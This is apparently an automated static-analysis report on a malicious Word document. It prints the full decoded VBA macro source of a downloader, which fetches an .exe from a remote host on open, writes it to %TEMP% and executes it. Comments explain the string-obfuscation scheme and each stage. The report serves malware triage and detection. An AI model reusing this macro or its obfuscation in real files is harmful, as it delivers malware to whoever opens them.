Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d75f6697e1f9b21…

MALICIOUS

Office (OLE)

71.0 KB Created: 2016-05-09 21:51:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 1c541c7c8693d669459d2c212471b980 SHA-1: 3c476fe81c57b7441e1d146167bd1f0a1670280f SHA-256: 4d75f6697e1f9b21ca43eb4af269868fd8e8ce74591bfd5c0ae84aea04c305a0
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes 'Shell()' and 'CreateObject()' calls, indicating an attempt to execute arbitrary code. This is consistent with a dropper or downloader malware.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim HYZoDRudI As Integer
    Set XETrTRXL = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim sXMzCyPBRE As Boolean
    Set bZiQEUoAX = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
    uvdSnC = CallByName(mdSgn, WTYaj, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim sWZeXmspMZ As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7477 bytes
SHA-256: da40084128e34dee80523ab81011de09ee853921503c4e2f1ba8e49a338a1c4f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
123 of 194 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point (the OLE_VBA_DOCOPEN finding): Word runs this
' as soon as the document is opened. The only live statement hands control
' to pNgavmiEKJ.gFfmUVs, which starts the download-and-execute chain; the
' local Boolean is declared but never used (filler).
Private Sub Document_Open()
Dim sWZeXmspMZ As Boolean
pNgavmiEKJ.gFfmUVs
End Sub
' Not referenced from the Document_Open call chain in this listing, and
' the procedures it calls (RdzCgNLfo, cdVmY) are not defined in the visible
' source -- presumably padding to dilute signatures; confirm against the
' full 7477-byte module before treating it as dead code.
Private Sub fiajFHZsQ()
RdzCgNLfo "HktK", "y9xGo", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "TtcIaXa"
' Not referenced from the live call chain; every procedure it calls is
' undefined in the visible source -- looks like padding (unverified).
Private Sub jESbkyhpJ(ByVal xSOLF As String)
cUAGYTZsVc 1225, 2737, "Ns0Rg"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "ivN1", "y8J"
End Sub
' Helper for the string decoder in module qlpiGK: returns the single
' character of fmCfWeSIcR at 1-based position GGqKPKJrex (a thin Mid wrapper).
' The local Boolean is unused filler.
Public Function XHESS(ByVal GGqKPKJrex As Integer, ByVal fmCfWeSIcR As String) As String
Dim KcvPasUi As Boolean
XHESS = Mid(fmCfWeSIcR, GGqKPKJrex, 1)
End Function
' Not referenced from the live call chain; yqdpRWtCu is undefined in the
' visible source -- looks like padding (unverified).
Private Sub NKHVta(ByVal MCXmSWbhc As String)
yqdpRWtCu
End Sub
' Membership test used by the decoder: InStr returns the position of
' gHcvgocwY inside yOOFbERKq (0 if absent), and the Integer-to-Boolean
' coercion makes the result True when the character is present.
' NzkNKHftg is accepted but never read. No Option Compare directive is
' visible, so the comparison is binary (case-sensitive) by default.
Public Function NcgIWIQvgK(ByVal gHcvgocwY As String, ByVal NzkNKHftg As String, ByVal yOOFbERKq As String) As Boolean
Dim VnIBA As String
Dim PBvML As String
NcgIWIQvgK = InStr(1, yOOFbERKq, gHcvgocwY)
End Function

Attribute VB_Name = "qlpiGK"
' The sample's string-obfuscation scheme. Every sensitive string (URL,
' file path, COM member names) is stored with junk characters interleaved,
' and this routine strips them: it walks gcFsEfv one character at a time
' and keeps only the characters that do NOT occur in cEfbjz (the "junk
' alphabet"). Example from this listing: RiYKggL("jE0xe0jc", "jWh60f")
' yields "Exec". The uJCPXVWw() argument is passed but ignored by the
' callee, and `XQUKUIlGS = 9746` assigns an undeclared variable that is
' never read (no Option Explicit is visible) -- both are filler.
Public Function RiYKggL(ByVal gcFsEfv As String, ByVal cEfbjz As String) As String
Dim OtAqQxMv As Boolean
Dim SdPdCiw As String, IBGFmd As String
For pvWGCLgX = 1 To Len(gcFsEfv)
OtAqQxMv = TtcIaXa.NcgIWIQvgK(TtcIaXa.XHESS(pvWGCLgX, gcFsEfv), uJCPXVWw, cEfbjz)
If Not OtAqQxMv Then
XQUKUIlGS = 9746
RiYKggL = RiYKggL & TtcIaXa.XHESS(pvWGCLgX, gcFsEfv)
End If
Next
End Function
' Returns a constant that the decoder receives as its ignored middle
' argument; the assignment to IkmTucyV has no effect. Filler.
Private Function uJCPXVWw() As String
IkmTucyV = ""
uJCPXVWw = "2WJnP"
End Function

Attribute VB_Name = "tIvJlZJvF"
' Late-binding wrappers around CallByName (the OLE_VBA_CALLBYNAME finding).
' Member names are passed in as decoded strings so that calls such as
' ".Send", ".Write", ".SaveToFile" or ".Exec" never appear literally in the
' source. CallByName's CallType values used below: 1 = VbMethod,
' 2 = VbGet (property read), 4 = VbLet (property assignment).
'
' Property read: returns mdSgn.<WTYaj>. CfOzRoZGun and VgCqVQCru are
' unused; the two Integer locals are filler. Used to read ResponseBody
' from the HTTP object.
Public Function uvdSnC(ByVal mdSgn As Object, ByVal CfOzRoZGun As String, ByVal WTYaj As String, ByVal VgCqVQCru As Integer) As Variant
Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
uvdSnC = CallByName(mdSgn, WTYaj, 2)
End Function
' Method call with two arguments: GBtVkMkQ.<PvlzazUfA>(HaGNDmv, tpyGbdoEQj).
' Note the argument order is swapped relative to the parameter list.
' Used for SaveToFile(path, 2).
Public Sub aeAafPvM(ByVal PvlzazUfA As String, ByVal tpyGbdoEQj As Variant, ByVal HaGNDmv As Variant, ByVal GBtVkMkQ As Object)
Dim lHmBuq As String
CallByName GBtVkMkQ, PvlzazUfA, 1, HaGNDmv, tpyGbdoEQj
End Sub
' Not referenced from the live call chain; HTXti is undefined here. Filler.
Private Function rtWcGCOGDg() As Boolean
HTXti "tgYI"
rtWcGCOGDg = False
End Function
' Indexed property read returning an object: Set cvgpWXl.<QSCuS>(BeAJg).
' Used to fetch WScript.Shell.Environment("PROCESS").
Public Function MFFQv(ByVal BeAJg As String, ByVal QSCuS As String, ByVal cvgpWXl As Object) As Variant
Dim JBfjk As Boolean
Dim AzQjSLoU As Boolean
Set MFFQv = CallByName(cvgpWXl, QSCuS, 2, BeAJg)
End Function
' Method call with one argument: zZDIBErBe.<BcimJzTXxI>(ZpLhgd).
' zYwmBjKdA is unused. Used for Stream.Write(body) and Shell.Exec(path).
Public Sub ofQEagNCR(ByVal zYwmBjKdA As Boolean, ByVal BcimJzTXxI As String, ByVal zZDIBErBe As Object, ByVal ZpLhgd As Variant)
Dim sbMoAZE As Integer
Dim LOkAk As Integer
CallByName zZDIBErBe, BcimJzTXxI, 1, ZpLhgd
End Sub
' Not referenced from the live call chain; callees undefined here. Filler.
Private Sub huWOw(ByVal XshmLCte As Boolean)
NvOKlpusE
aVtapbVnl "", 1093, 9096
End Sub
' Not referenced from the live call chain; callees undefined here. Filler.
Private Function QqZeLOBHL() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "BWQ"
CGgZkEaFBc
QqZeLOBHL = 1258
End Function
' Property assignment: WVZkUPnPQy.<oegby> = dngYyt. ffzrOMlAl and
' yYMpHBuEO are unused. Used to set Stream.Type = 1 (binary).
Public Sub ETZlueM(ByVal ffzrOMlAl As Integer, ByVal oegby As String, ByVal dngYyt As Variant, ByVal yYMpHBuEO As String, ByVal WVZkUPnPQy As Object)
CallByName WVZkUPnPQy, oegby, 4, dngYyt
End Sub
' Not referenced from the live call chain; gOZso is undefined here. Filler.
Private Function BDIyEQNA(ByVal pVGKTKG As String) As Boolean
gOZso 1884
BDIyEQNA = True
End Function
' Method call with no arguments: jFLQYI.<aPcNqh>(). The assignment to the
' undeclared kayWGvM is filler. Used for Send, Open and Close.
Public Sub nDXWgVaB(ByVal jFLQYI As Object, ByVal aPcNqh As String)
Dim HJKDWFSbK As Integer
Dim qkZxzUw As Integer
kayWGvM = ""
CallByName jFLQYI, aPcNqh, 1
End Sub

Attribute VB_Name = "yxAzCBpe"
' COM object factories (the OLE_VBA_CREATEOBJ / OLE_VBA_WSCRIPT findings).
' Each returns a fresh instance; the Dim lines are unused filler. Taken
' together -- an HTTP client, a binary stream writer and WScript.Shell --
' they are the standard trio for a macro downloader, and their creation
' from WINWORD.EXE is what the heuristics above key on.
'
' ADODB.Stream: used to write the downloaded bytes to disk.
Public Function bZiQEUoAX() As Object
Dim sXMzCyPBRE As Boolean
Set bZiQEUoAX = CreateObject("ADODB.Stream")
End Function
' WScript.Shell: used both to read the process environment (%TEMP%) and,
' via .Exec, to launch the dropped file.
Public Function XETrTRXL() As Object
Dim HYZoDRudI As Integer
Set XETrTRXL = CreateObject("WScript.Shell")
End Function
' MSXML2.ServerXMLHTTP.6.0: the HTTP client used to fetch the payload.
Public Function aJIfxJZodD() As Object
Dim AiSqstM As String
Set aJIfxJZodD = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
' Not referenced from the live call chain; callees undefined here. Filler.
Private Function QufpcZdA() As Integer
YRcIVIcog
zzTmoaeZe False, ""
ngYFxDZeTQ False, 7239, ""
QufpcZdA = 7668
End Function

Attribute VB_Name = "pNgavmiEKJ"
' Decodes the payload download URL. Stripping the characters "E", "S" and
' "1" from the literal leaves an http:// URL of a .exe on a remote host
' (defanged: hxxp://sascua[.]com/system/cache/32f32g.exe) -- the network
' IoC for this sample. The assignment to qAgGuRAod is filler.
Private Function EomLao() As String
qAgGuRAod = 7052
EomLao = qlpiGK.RiYKggL("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
' Execution stage: PGEJFjiOIP decodes to "Exec", so this resolves to
' WScript.Shell.Exec(YnuZrPfbaC), launching the file that was just
' written to disk. The Integer local and the MDpGo assignment are filler.
' Detection note: child process of WINWORD.EXE spawned from %TEMP%.
Private Sub ppkHpIx(ByVal YnuZrPfbaC As String)
Dim Pyqsuj As Integer
MDpGo = "kBmv"
tIvJlZJvF.ofQEagNCR True, PGEJFjiOIP, yxAzCBpe.XETrTRXL, YnuZrPfbaC
End Sub
' Called from ThisDocument.Document_Open; just forwards to the orchestrator
' YUSZTLp. The assignment to cKAIKaerq is filler.
Public Sub gFfmUVs()
cKAIKaerq = ""
YUSZTLp
End Sub
' Constant passed to tIvJlZJvF.ETZlueM as its unused yYMpHBuEO argument. Filler.
Private Function cQrOaLqaF() As String
cQrOaLqaF = "pyHY"
End Function
' Builds the local drop path: "eTJEoMPe" minus "eJo" is "TEMP", JzEfZof
' resolves that through the process environment, and zVFSzCf appends the
' decoded file name -- i.e. %TEMP%/d021166baf.exe (host IoC). The Integer
' local is filler.
Private Function rPeqnQcyK() As String
Dim eEhHa As Integer
rPeqnQcyK = JzEfZof(qlpiGK.RiYKggL("eTJEoMPe", "eJo")) & zVFSzCf
End Function
' Decodes to "ResponseBody" -- the property read from the HTTP object to
' obtain the downloaded bytes. This is the literal the report cites as an
' example of name-mangling obfuscation.
Private Function WNqBeL() As String
WNqBeL = qlpiGK.RiYKggL("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
' Constant passed to aJBkAaphH as its unused gUaDB argument. Filler.
Private Function NhnSmVlON() As String
NhnSmVlON = "Vb0T7"
End Function
' Download stage. With the decoder applied this reads:
'   http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
'   http.Open "GET", lxYJsBCX, False        ' DhDnlIsSB decodes to "GET"
'   http.Send                               ' "PSeYbndb" minus "bPY"
'   rrQumoYv ..., GBZskde, ..., http.ResponseBody
' GBZskde is the local file path, lxYJsBCX the URL; sIPyuadE and gUaDB are
' unused, as are the two Dim'd locals. The synchronous GET means the
' macro blocks until the payload host answers.
Private Sub aJBkAaphH(ByVal sIPyuadE As Integer, ByVal GBZskde As String, ByVal lxYJsBCX As String, ByVal gUaDB As String)
Dim TaULKEoJ As String, ZyPTWCYq As Integer
Set oxUnFM = yxAzCBpe.aJIfxJZodD
oxUnFM.Open DhDnlIsSB, lxYJsBCX, False
tIvJlZJvF.nDXWgVaB oxUnFM, qlpiGK.RiYKggL("PSeYbndb", "bPY")
rrQumoYv False, GBZskde, "yR0", tIvJlZJvF.uvdSnC(oxUnFM, "KP", WNqBeL, 1945)
End Sub
' Decodes to "Close" (ADODB.Stream method name).
Private Function hHCstF() As String
hHCstF = qlpiGK.RiYKggL("CRlAoRsAAe", "ERNA")
End Function
' Indirection layer: returns the decoded download URL from EomLao.
' The Integer local is filler.
Private Function cKNQjiDW() As String
Dim pOrRFib As Integer
cKNQjiDW = EomLao
End Function
' Not referenced from the live call chain; every callee is undefined in the
' visible source -- padding (unverified against the full module).
Private Sub CEGmN()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
' Indirection layer: returns the decoded payload file name from YTtJZVQK.
' Both Dim lines are filler.
Private Function zVFSzCf() As String
Dim jbmFfpJi As String
Dim YdVNBik As Integer
zVFSzCf = YTtJZVQK
End Function
' Orchestrator for the whole infection chain, reached via
' Document_Open -> gFfmUVs. In order:
'   1. aJBkAaphH: GET the remote .exe (URL from cKNQjiDW) and write it to
'      %TEMP%/d021166baf.exe (path from rPeqnQcyK).
'   2. ppkHpIx: WScript.Shell.Exec on that path.
' The On Error GoTo makes any failure (no network, blocked host, write
' denied) exit silently with no visible side effect, which is typical for
' a downloader that wants to stay quiet when it cannot fetch its payload.
' The two string assignments are filler; the one after Exit Sub is
' unreachable.
Private Sub YUSZTLp()
On Error GoTo lesJtbZS
aJBkAaphH 5708, rPeqnQcyK, cKNQjiDW, NhnSmVlON
ieHcrIl = "BsVc4"
ppkHpIx rPeqnQcyK
Exit Sub
QIGVmfY = "4u"
lesJtbZS:
End Sub
' Decodes the payload file name: stripping "S", "j", "g", "k", "r" leaves
' "/d021166baf.exe" (forward slash; appended directly to %TEMP%).
' The IFLCzb assignment is filler.
Private Function YTtJZVQK() As String
IFLCzb = True
YTtJZVQK = qlpiGK.RiYKggL("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
' Not referenced from the live call chain; callees undefined here. Filler.
Private Function LtgcPJUr(ByVal TZigq As Integer, ByVal BkXNoxybM As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
LtgcPJUr = ""
End Function
' Not referenced from the live call chain; NACpLN and the other callees are
' undefined in the visible source -- padding (unverified).
Private Function fgsPwk(ByVal quCugkfEx As Boolean) As Boolean
If NACpLN("SzbAB", "hv") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "zW3X"
SFyHb
fgsPwk = False
End Function
' Not referenced from the live call chain; aBDhFcyR is undefined here. Filler.
Private Sub xqHViadvzm()
aBDhFcyR "", "FFpd"
End Sub
' Decodes to "GET" -- the HTTP verb passed to ServerXMLHTTP.Open.
' The bwVhN assignment is filler.
Private Function DhDnlIsSB() As String
bwVhN = 9168
DhDnlIsSB = qlpiGK.RiYKggL("GHZEjT", "4jZc0H")
End Function
' Decodes to "Open" (ADODB.Stream method name).
Private Function rdpYgruZts() As String
rdpYgruZts = qlpiGK.RiYKggL("wOpWeinw", "wiW")
End Function
' Decodes to "Exec" (WScript.Shell method used to launch the dropped file).
' The mVMPpQPeMQ assignment is filler.
Private Function PGEJFjiOIP() As String
mVMPpQPeMQ = 3401
PGEJFjiOIP = qlpiGK.RiYKggL("jE0xe0jc", "jWh60f")
End Function
' Write-to-disk stage. Decoded, the sequence is the textbook ADODB.Stream
' file drop:
'   stream.Type = 1            ' WCCYnnYfik -> "Type"; 1 = adTypeBinary
'   stream.Open                ' rdpYgruZts -> "Open"
'   stream.Write Cdyuk         ' "Wbr3i0OtOe" minus "b3O0" -> "Write"
'   stream.SaveToFile PsZYlZhJp, 2   ' "hSaGhverTGhoFGrilGeG" minus "rhG"
'                                    ' -> "SaveToFile"; 2 = adSaveCreateOverWrite
'   stream.Close               ' hHCstF -> "Close"
' Cdyuk is the ResponseBody from the HTTP request and PsZYlZhJp the %TEMP%
' path; cNMdym, XBbWWJWuh, the Dim line and the bZfJcN assignment are filler.
Private Sub rrQumoYv(ByVal cNMdym As Boolean, ByVal PsZYlZhJp As String, ByVal XBbWWJWuh As String, ByVal Cdyuk As Variant)
Dim RztyfS As String
Set jFBKbfZja = yxAzCBpe.bZiQEUoAX
bZfJcN = 978
tIvJlZJvF.ETZlueM 654, WCCYnnYfik, 1, cQrOaLqaF, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, rdpYgruZts
tIvJlZJvF.ofQEagNCR True, qlpiGK.RiYKggL("Wbr3i0OtOe", "b3O0"), jFBKbfZja, Cdyuk
tIvJlZJvF.aeAafPvM qlpiGK.RiYKggL("hSaGhverTGhoFGrilGeG", "rhG"), 2, PsZYlZhJp, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, hHCstF
End Sub
' Environment-variable lookup without naming WshShell.Environment in the
' source: the two literals decode to "PROCESS" and "Environment", so
' ikHNExdC becomes WScript.Shell.Environment("PROCESS") and the function
' returns ikHNExdC(EjQEYb) -- with EjQEYb = "TEMP" from the caller, the
' user's temp directory. The ZcTzOUAO assignment is filler.
Private Function JzEfZof(ByVal EjQEYb As String) As String
Set ikHNExdC = tIvJlZJvF.MFFQv(qlpiGK.RiYKggL("rPrROFCr0ErSFS", "r0F"), qlpiGK.RiYKggL("EWwn vi  ro00n0mwenWtw", "Ww0 "), yxAzCBpe.XETrTRXL)
ZcTzOUAO = False
JzEfZof = ikHNExdC(EjQEYb)
End Function
' Decodes to "Type" (ADODB.Stream property set to 1 = binary before writing).
Private Function WCCYnnYfik() As String
WCCYnnYfik = qlpiGK.RiYKggL("TPyPlpe1", "1lmPs")
End Function